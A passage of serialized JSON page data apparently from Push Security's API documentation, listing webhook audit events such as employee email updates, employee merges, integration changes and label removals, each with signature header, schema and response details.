t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_676"}},"responseCodes":["2XX"],"pointer":"extension-branding-logo-uploaded","href":"audit/extension-branding-logo-uploaded-event","openApiOperationId":"extension-branding-logo-uploaded-event","summary":"Extension branding logo uploaded"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_676","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_676"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/extension-branding-logo-uploaded/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/extension-branding-logo-uploaded-event"}],"panels":[]}]},"httpPath":"extension-branding-logo-uploaded"},{"label":"Extension branding updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/extension-branding-updated-event","routeSlug":"/webhooks-v1/audit/extension-branding-updated-event","metadata":{"seo":{"title":"Extension branding updated","description":"The browser extension banner branding has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"extension-branding-updated-event","name":"Extension branding updated","isWebhook":true,"pointer":"/paths/extension-branding-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Extension branding updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The browser extension banner branding has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/extension-branding-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_677"}},"schemaId":"schema_677","pointer":"/paths/extension-branding-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"extension-branding-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_677"}},"responseCodes":["2XX"],"pointer":"extension-branding-updated","href":"audit/extension-branding-updated-event","openApiOperationId":"extension-branding-updated-event","summary":"Extension branding updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_677","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_677"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/extension-branding-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/extension-branding-updated-event"}],"panels":[]}]},"httpPath":"extension-branding-updated"},{"label":"Employee email updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employee-email-updated-event","routeSlug":"/webhooks-v1/audit/employee-email-updated-event","metadata":{"seo":{"title":"Employee email updated","description":"An admin user has updated the primary email of an employee."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employee-email-updated-event","name":"Employee email updated","isWebhook":true,"pointer":"/paths/employee-email-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employee email updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the primary email of an employee."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employee-email-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_678"}},"schemaId":"schema_678","pointer":"/paths/employee-email-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employee-email-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_678"}},"responseCodes":["2XX"],"pointer":"employee-email-updated","href":"audit/employee-email-updated-event","openApiOperationId":"employee-email-updated-event","summary":"Employee email updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_678","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_678"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employee-email-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employee-email-updated-event"}],"panels":[]}]},"httpPath":"employee-email-updated"},{"label":"Employee name updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employee-name-updated-event","routeSlug":"/webhooks-v1/audit/employee-name-updated-event","metadata":{"seo":{"title":"Employee name updated","description":"An admin user has updated the first name and/or last name of an employee."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employee-name-updated-event","name":"Employee name updated","isWebhook":true,"pointer":"/paths/employee-name-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employee name updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the first name and/or last name of an employee."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employee-name-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_679"}},"schemaId":"schema_679","pointer":"/paths/employee-name-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employee-name-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_679"}},"responseCodes":["2XX"],"pointer":"employee-name-updated","href":"audit/employee-name-updated-event","openApiOperationId":"employee-name-updated-event","summary":"Employee name updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_679","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_679"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employee-name-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employee-name-updated-event"}],"panels":[]}]},"httpPath":"employee-name-updated"},{"label":"Employee removed from group","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employee-removed-from-group-event","routeSlug":"/webhooks-v1/audit/employee-removed-from-group-event","metadata":{"seo":{"title":"Employee removed from group","description":"An admin user removed an employee from a group."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employee-removed-from-group-event","name":"Employee removed from group","isWebhook":true,"pointer":"/paths/employee-removed-from-group/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employee removed from group","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user removed an employee from a group."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employee-removed-from-group/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_680"}},"schemaId":"schema_680","pointer":"/paths/employee-removed-from-group/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employee-removed-from-group","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_680"}},"responseCodes":["2XX"],"pointer":"employee-removed-from-group","href":"audit/employee-removed-from-group-event","openApiOperationId":"employee-removed-from-group-event","summary":"Employee removed from group"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_680","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_680"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employee-removed-from-group/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employee-removed-from-group-event"}],"panels":[]}]},"httpPath":"employee-removed-from-group"},{"label":"Employees merged","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employees-merged-event","routeSlug":"/webhooks-v1/audit/employees-merged-event","metadata":{"seo":{"title":"Employees merged","description":"An admin user has merged a list of employees."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employees-merged-event","name":"Employees merged","isWebhook":true,"pointer":"/paths/employees-merged/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employees merged","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has merged a list of employees."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employees-merged/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_681"}},"schemaId":"schema_681","pointer":"/paths/employees-merged/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employees-merged","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_681"}},"responseCodes":["2XX"],"pointer":"employees-merged","href":"audit/employees-merged-event","openApiOperationId":"employees-merged-event","summary":"Employees merged"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_681","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_681"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employees-merged/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employees-merged-event"}],"panels":[]}]},"httpPath":"employees-merged"},{"label":"Employees unmerged","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/employees-unmerged-event","routeSlug":"/webhooks-v1/audit/employees-unmerged-event","metadata":{"seo":{"title":"Employees unmerged","description":"An admin user has unmerged one of the emails of an employee into a new employee."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employees-unmerged-event","name":"Employees unmerged","isWebhook":true,"pointer":"/paths/employees-unmerged/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employees unmerged","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has unmerged one of the emails of an employee into a new employee."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employees-unmerged/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_682"}},"schemaId":"schema_682","pointer":"/paths/employees-unmerged/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employees-unmerged","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_682"}},"responseCodes":["2XX"],"pointer":"employees-unmerged","href":"audit/employees-unmerged-event","openApiOperationId":"employees-unmerged-event","summary":"Employees unmerged"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_682","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_682"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employees-unmerged/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/employees-unmerged-event"}],"panels":[]}]},"httpPath":"employees-unmerged"},{"label":"Integration added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/integration-added-event","routeSlug":"/webhooks-v1/audit/integration-added-event","metadata":{"seo":{"title":"Integration added","description":"A new integration has been added."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"integration-added-event","name":"Integration added","isWebhook":true,"pointer":"/paths/integration-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Integration added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A new integration has been added."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/integration-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_683"}},"schemaId":"schema_683","pointer":"/paths/integration-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"integration-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_683"}},"responseCodes":["2XX"],"pointer":"integration-added","href":"audit/integration-added-event","openApiOperationId":"integration-added-event","summary":"Integration added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_683","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_683"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/integration-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/integration-added-event"}],"panels":[]}]},"httpPath":"integration-added"},{"label":"Integration completed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/integration-completed-event","routeSlug":"/webhooks-v1/audit/integration-completed-event","metadata":{"seo":{"title":"Integration completed","description":"An integration has been successfully completed."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"integration-completed-event","name":"Integration completed","isWebhook":true,"pointer":"/paths/integration-completed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Integration completed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An integration has been successfully completed."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/integration-completed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_684"}},"schemaId":"schema_684","pointer":"/paths/integration-completed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"integration-completed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_684"}},"responseCodes":["2XX"],"pointer":"integration-completed","href":"audit/integration-completed-event","openApiOperationId":"integration-completed-event","summary":"Integration completed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_684","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_684"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/integration-completed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/integration-completed-event"}],"panels":[]}]},"httpPath":"integration-completed"},{"label":"Integration removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/integration-removed-event","routeSlug":"/webhooks-v1/audit/integration-removed-event","metadata":{"seo":{"title":"Integration removed","description":"A integration has been removed."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"integration-removed-event","name":"Integration removed","isWebhook":true,"pointer":"/paths/integration-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Integration removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A integration has been removed."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/integration-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_685"}},"schemaId":"schema_685","pointer":"/paths/integration-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"integration-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_685"}},"responseCodes":["2XX"],"pointer":"integration-removed","href":"audit/integration-removed-event","openApiOperationId":"integration-removed-event","summary":"Integration removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_685","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_685"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/integration-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/integration-removed-event"}],"panels":[]}]},"httpPath":"integration-removed"},{"label":"Label updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/label-updated-event","routeSlug":"/webhooks-v1/audit/label-updated-event","metadata":{"seo":{"title":"Label updated","description":"A label has been updated."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"label-updated-event","name":"Label updated","isWebhook":true,"pointer":"/paths/label-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Label updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A label has been updated."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/label-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_686"}},"schemaId":"schema_686","pointer":"/paths/label-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"label-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_686"}},"responseCodes":["2XX"],"pointer":"label-updated","href":"audit/label-updated-event","openApiOperationId":"label-updated-event","summary":"Label updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_686","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_686"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/label-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/label-updated-event"}],"panels":[]}]},"httpPath":"label-updated"},{"label":"Label removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/label-removed-event","routeSlug":"/webhooks-v1/audit/label-removed-event","metadata":{"seo":{"title":"Label removed","description":"A label has been removed."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"label-removed-event","name":"Label removed","isWebhook":true,"pointer":"/paths/label-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Label removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A label has been removed."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/label-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request 